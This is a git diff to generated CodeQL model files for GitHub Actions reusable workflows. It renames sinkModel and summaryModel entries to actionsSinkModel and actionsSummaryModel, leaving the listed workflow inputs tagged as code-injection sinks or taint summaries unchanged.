@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 35738fe6c0f8..4a5c66bc7440 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 77db768cf32e..a1e4b624b454 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 509de9546464..888aed947da2 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6e0e2865e83c..3b5f69e93423 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 69667ce10b10..8e28b46f2c70 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 175012c10c94..7f63b48ed848 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 84a834d9a1f0..e7e42031e047 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 2946a78cf835..0c34609ccefc 100644 
--- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 7ce68d84ca5e..82de946e406e 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 8e3b9ccc0f8a..09c4c2a83c31 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index f41e2ee12461..0e4571fc728b 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index c643a6a9fe06..6a03acfb11dc 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.build-type", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index 9aad213b1dfe..f41ee1211d3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.tag_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index 1906ef45379e..8a64c0ce5f11 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index f5ce50243f7c..18e66bf72913 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 58c30f3cd026..1ed7561a5334 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index d6c0ced50a6a..738fde2cb865 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index fdcb8775dad4..c61a63f11443 100644 
--- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 66889d2cf428..fef036f4f297 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index e5c5cfeabd37..b13ba8bc40f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.test_run", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 4dc3fc2bc98f..3fb2fefff6b9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.build_script_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 52c4b4c7a24c..4344e254be05 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 038f92a53172..2a7c5feafead 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 6fab83acf59a..9ccb41c3a8c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 238856cc7b9b..b71e6c001d00 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 71b584f54275..ff0695c0ef25 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.append-date-and-hash", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index 1aa154828876..9576ce3892a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 89dd705f5903..b78d61184114 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eb57c708bf53..cbe56806056b 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.SUDO", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index 048a753c553f..391bbc6aacb9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 739f6a546b2d..f8b490726da9 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index f6c2769caaf9..889499eea3d3 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 4d104c74c667..2dce19050ed7 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.config", "code-injection", "generated"] @@ -11,6 +11,6 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 2a9e2f9fd1ab..c80f8e732b64 100644 
--- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index 9f56abf2858b..b85a11d81f2e 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.count", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 8c73342d5fe3..f8102400cc72 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] - ["etcd-io/etcd/.github/workflows/robustness-template.yaml", "*", "input.scenario", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 87253d882243..1af7b8322035 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] - ["eventstore/eventstore/.github/workflows/build-container-reusable.yml", "*", "input.container-runtime", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9eb4c17cd3a8..c0688a4a5e06 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 860dcdcb43d4..4e91308a0049 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.tag-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index 539edcd58916..bc42c619599d 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index b1b37d967e9a..68925b294bb6 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.s3_path", "code-injection", "generated"] 
